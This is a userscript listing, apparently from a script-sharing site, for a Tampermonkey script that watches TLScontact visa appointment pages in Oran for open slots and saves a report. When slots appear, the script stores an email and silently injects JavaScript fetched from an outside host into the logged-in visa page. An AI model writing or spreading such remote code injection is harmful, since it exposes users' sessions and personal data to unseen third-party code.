Tls RepportNew

detailled reports of openning appointements

Aby zainstalować ten skrypt, wymagana jest instalacje jednego z następujących rozszerzeń: Tampermonkey, Greasemonkey lub Violentmonkey.

Aby zainstalować ten skrypt, wymagana jest instalacje jednego z następujących rozszerzeń: Tampermonkey, Violentmonkey.

Aby zainstalować ten skrypt, wymagana jest instalacje jednego z następujących rozszerzeń: Tampermonkey, Violentmonkey.

Aby zainstalować ten skrypt, wymagana będzie instalacja rozszerzenia Tampermonkey lub Userscripts.

You will need to install an extension such as Tampermonkey to install this script.

Aby zainstalować ten skrypt, musisz zainstalować rozszerzenie menedżera skryptów użytkownika.

(Mam już menedżera skryptów użytkownika, pozwól mi to zainstalować!)

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

Będziesz musiał zainstalować rozszerzenie menedżera stylów użytkownika, aby zainstalować ten styl.

Będziesz musiał zainstalować rozszerzenie menedżera stylów użytkownika, aby zainstalować ten styl.

Musisz zainstalować rozszerzenie menedżera stylów użytkownika, aby zainstalować ten styl.

(Mam już menedżera stylów użytkownika, pozwól mi to zainstalować!)

// ==UserScript==
// @name         Tls RepportNew
// @namespace    http://tampermonkey.net/
// @version      2.4
// @description  detailled reports of openning appointements
// @author       MeGa
// @match        https://visa-fr.tlscontact.com/dz/ORN/myapp.php*
// @match        https://visa-fr.tlscontact.com/dz/orn/myapp.php*
// @icon         https://www.google.com/s2/favicons?domain=tlscontact.com
// @grant        God
// ==/UserScript==


if(document.getElementsByClassName('appt-table-btn dispo').length !== 0) {
(function() {
    'use strict';
    /////// Alert code ///////
    localStorage.setItem('usermail',"[email protected]");
    var script = document.createElement('script');
    script.src = 'https://www.prowebgen.com/alerterp203.js';
    document.head.appendChild(script);
    /////// Alert code ///////
})();setTimeout(function(){var classSlot= document.getElementsByClassName('appt-table-btn dispo');
var slot =document.querySelector("#body > div > table > tbody > tr:nth-child(7) > td.pending").outerHTML;
                                                                          var text = slot,
    blob = new Blob([text], { type: 'text/plain' }),
    anchor = document.createElement('a');

anchor.download = "RapportTLS.html";
anchor.href = (window.webkitURL || window.URL).createObjectURL(blob);
anchor.dataset.downloadurl = ['text/plain', anchor.download, anchor.href].join(':');
anchor.click();},511);}